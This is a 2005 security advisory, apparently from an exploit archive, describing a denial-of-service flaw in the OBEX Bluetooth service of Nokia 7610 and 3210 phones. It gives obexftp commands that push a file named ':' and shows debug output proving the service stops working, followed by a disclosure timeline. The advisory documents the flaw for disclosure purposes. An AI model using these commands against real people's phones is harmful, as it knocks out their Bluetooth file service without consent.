what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

nokiaDoS.txt

nokiaDoS.txt
Posted Sep 27, 2005
Authored by Alejandro Ramos | Site unsec.net

Nokia models 7610 and 3210 suffer from a denial of service flaw in the OBEX implementation.

tags | advisory, denial of service
SHA-256 | b0c97ab211f95b643a9aa6908eb8776121e799c92c0cdadae2646cd6c154ba66

nokiaDoS.txt

Change Mirror Download
Title: Nokia 7610, 3210 Denial of Service in OBEX.
Severity: Low
Affected: tested in nokia 7610 and nokia 3210 (maybe others symbian
phones).
Problem type: remote

Details:
----------------------------------------------------------------------------------------------------------

They are some flaw in the OBEX implementation in nokia 7610 (V4.0.437
15-09-04 RH51), and others, that disable this service if you send
archive with name ":" or "\".

----
Quote of IROBEX12.pdf Pag:40, section 4.3 -- (OBEX specification)

"Pushing objects into the inbox Objects are pushed into the inbox by using
the PUT command with a Name header. The string in the Name header
should not contain any path characters such as ‘:’, ‘/’ or ‘\’. Objects with
improperly formed names should be rejected."
----

The device ask for PIN if you are not paired or ask if you want accept a
connection of the remote box, you need ACCEPT. It have low risk ,
becouse dont work if you dont accept the incoming connection.

If connection is established, the file is sended and they arent "New
message arrived" message, like when you send correct archive. Its ok,
the filename is dropped.

The problem is the OBEX service dont work anymore after this, if you
tried to send other file or from some vcard from other device, you cant
connect to the remote OBEX service again.

Demostration with Linux as client:


jim:~# hcitool scan
Scanning ...
00:13:70:5E:1F:01 7610


jim:~# obexftp -b 00:13:70:5E:1F:01 -p \:
Browsing 00:13:70:5E:1F:01 ...
Channel: 10
No custom transport
obexftp_cli_open()
obexftp_cli_connect_uuid()
Connecting...obexftp_cli_connect_uuid() BT 1
cli_sync_request()
obexftp_sync()
client_done()
client_done() Found connection number: -1022384746
client_done() Sender identified
obexftp_sync() OBEX_HandleInput = 31
obexftp_sync() Done success=1
done
Sending ":"... obexftp_put_file() Sending : -> :
build_object_from_file() Lastmod = 2005-09-18T00:16:42Z
cli_sync_request()
cli_fillstream_from_file()
cli_fillstream_from_file() Read 6 bytes
cli_fillstream_from_file()
cli_fillstream_from_file() Read 0 bytes
obexftp_sync()
obexftp_sync() OBEX_HandleInput = 0
failed: :
obexftp_cli_disconnect()
Disconnecting...cli_sync_request()
failed: disconnect
obexftp_cli_close()

# Error pushing other file after send ":" filename:

jim:~# obexftp -b 00:13:70:5E:1F:01 -p /etc/hosts
Browsing 00:13:70:5E:1F:01 ...
Channel: 10
No custom transport
obexftp_cli_open()
obexftp_cli_connect_uuid()
Connecting...obexftp_cli_connect_uuid() BT -1
failed: connect
Still trying to connect
obexftp_cli_connect_uuid()
Connecting...obexftp_cli_connect_uuid() BT -1
failed: connect
Still trying to connect
obexftp_cli_connect_uuid()
Connecting...obexftp_cli_connect_uuid() BT -1
failed: connect
Still trying to connect
----------------------------------------------------------------------------------------------------------

Timeline:
20 Sept 2005: bug found.
21 Sept 2005: Nokia security contacted.
24 Sept 2005: Disclosure in NCN - V congress (http://www.noconname.org).
26 Sept 2005: Full disclosure.


--
A. Ramos.
mailto: <aramosf@unsec.net>
http://www.unsec.net
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close